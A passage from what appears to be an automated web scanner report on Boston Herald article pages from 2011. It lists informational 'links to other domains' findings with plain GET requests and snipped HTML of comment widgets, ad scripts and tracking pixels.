<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982396, 'joeromano');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" />&nbsp;Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments&cnum=1&at_comment=1982396#cnum1982396"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" />&nbsp;Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982396','/news/regional/view.bg?articleid=1312541&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
<!-- Equalize the height AND preload the f2 images -->
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982399,5,0);" ><img id="thumb_up_1982399" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982399,1,0);"><img id="thumb_down_1982399" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982399, 'bobo');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" />&nbsp;Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments&cnum=1&at_comment=1982399#cnum1982399"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" />&nbsp;Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982399','/news/regional/view.bg?articleid=1312541&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
<!-- Equalize the height AND preload the f2 images -->
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982401,5,0);" ><img id="thumb_up_1982401" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982401,1,0);"><img id="thumb_down_1982401" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982401, 'PollyfromBoston');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" />&nbsp;Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments&cnum=1&at_comment=1982401#cnum1982401"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" />&nbsp;Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982401','/news/regional/view.bg?articleid=1312541&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
<!-- Equalize the height AND preload the f2 images -->
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982402,5,0);" ><img id="thumb_up_1982402" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982402,1,0);"><img id="thumb_down_1982402" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982402, 'ironrange');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" />&nbsp;Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments&cnum=1&at_comment=1982402#cnum1982402"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" />&nbsp;Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982402','/news/regional/view.bg?articleid=1312541&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
<!-- Equalize the height AND preload the f2 images -->
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982404,5,0);" ><img id="thumb_up_1982404" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982404,1,0);"><img id="thumb_down_1982404" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982404, 'FromCapeCod');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" />&nbsp;Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments&cnum=1&at_comment=1982404#cnum1982404"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" />&nbsp;Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982404','/news/regional/view.bg?articleid=1312541&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
<!-- Equalize the height AND preload the f2 images -->
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982422,5,0);" ><img id="thumb_up_1982422" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982422,1,0);"><img id="thumb_down_1982422" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982422, 'WhyWorry');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" />&nbsp;Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments&cnum=1&at_comment=1982422#cnum1982422"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" />&nbsp;Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982422','/news/regional/view.bg?articleid=1312541&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;<a class="LinksRedNone" style="text-decoration:underline" href="http://www.heraldmedia.com/privacy.html" target="_new">Privacy commitment</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(108) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/867926_Splash_01282011.jpg" alt="Eric Williams allegedly posed as a..." /></div>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/news/regional/view/20110108owner_hopes_pet_snakes_its_way_to_safety/"><img src="http://multimedia.heraldinteractive.com/images/20110107/stp/c59fd8_Snake_01082011.jpg" alt="Owner hopes pet snakes its way to safety" /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.290. http://www.bostonherald.com/news/regional/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /news/regional/view.bg?articleid=1312541&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:37:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="Local Coverage - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/regional/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview%2F20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist%2Fsrvc%3Dhome%26position%3D7&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div id="bylineArea">
                                        <img class="bylineImage" src="http://cache.heraldinteractive.com/images/siteImages/reporters/daveWedge.jpg?1=1" alt="Dave Wedge" />
                                       <span class="bold">
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(108) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Feds: Fake cop scammed dates');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<font color="#888888"> [<a href="http://www.myspace.com" >website</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(108) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/867926_Splash_01282011.jpg" alt="Eric Williams allegedly posed as a..." /></div>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/news/regional/view/20110108owner_hopes_pet_snakes_its_way_to_safety/"><img src="http://multimedia.heraldinteractive.com/images/20110107/stp/c59fd8_Snake_01082011.jpg" alt="Owner hopes pet snakes its way to safety" /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.291. http://www.bostonherald.com/news/regional/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /news/regional/view.bg?articleid=1312552&srvc=next_article HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:39:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="Local Coverage - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/regional/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1312552&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
